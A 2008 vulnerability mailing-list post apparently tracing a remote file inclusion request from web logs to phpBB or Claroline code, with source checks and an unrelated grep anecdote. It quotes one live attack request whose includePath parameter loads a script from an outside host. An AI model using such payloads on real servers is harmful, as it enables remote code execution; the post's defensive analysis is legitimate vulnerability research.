[VIM] RFI BotNet and phpBB 0-day?

Steven M. Christey coley at linus.mitre.org
Thu Mar 20 17:19:36 UTC 2008


I tried to do something similar some time ago, automatically classifying
incoming RFI requests based with their CVE, but it was painful and
time-consuming and incomplete, for reasons you specified.  So yeah,
there's probably 0-days in our logs.

Dunno if it's a botnet but given Gadi's paper from last year on web server
compromises, it's a really good theory.


> > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f

I looked at the 2.0.23 source.

Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
/claroline/phpbb/page_tail.php to work.  So, this is probably Claroline.

phpBB2's page_tail.php in 2.0.23 also has a direct request prevention:

   if ( !defined('IN_PHPBB') )
   {
         die('Hacking attempt');
   }

and no mention of includePath.

HOWEVER, in Claroline 1.55 (an older version) we have:

  ./claroline155/claroline/phpbb/page_tail.php

But - no apparent luck:

  @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");

and no mention of includePath in that file.

claro_init_footer.inc.php seems clean.

Similar for 1.64.

However - $includePath is used all over the place in Claroline, and
apparently uses an unset(), so maybe there's a relationship with an unset
bug.

1.42 ZIP file seems corrupted, so I couldn't check it out.


Apropos to nothing, during my investigations, I found a REALLY efficient
way to create a huge file:

  grep PATTERN `find . -type file` > myfile

apparently, my shell creates "myfile" before the find is executed, so grep
runs against its own results file.  I caught a gig in a matter of seconds
:)

- Steve


More information about the VIM mailing list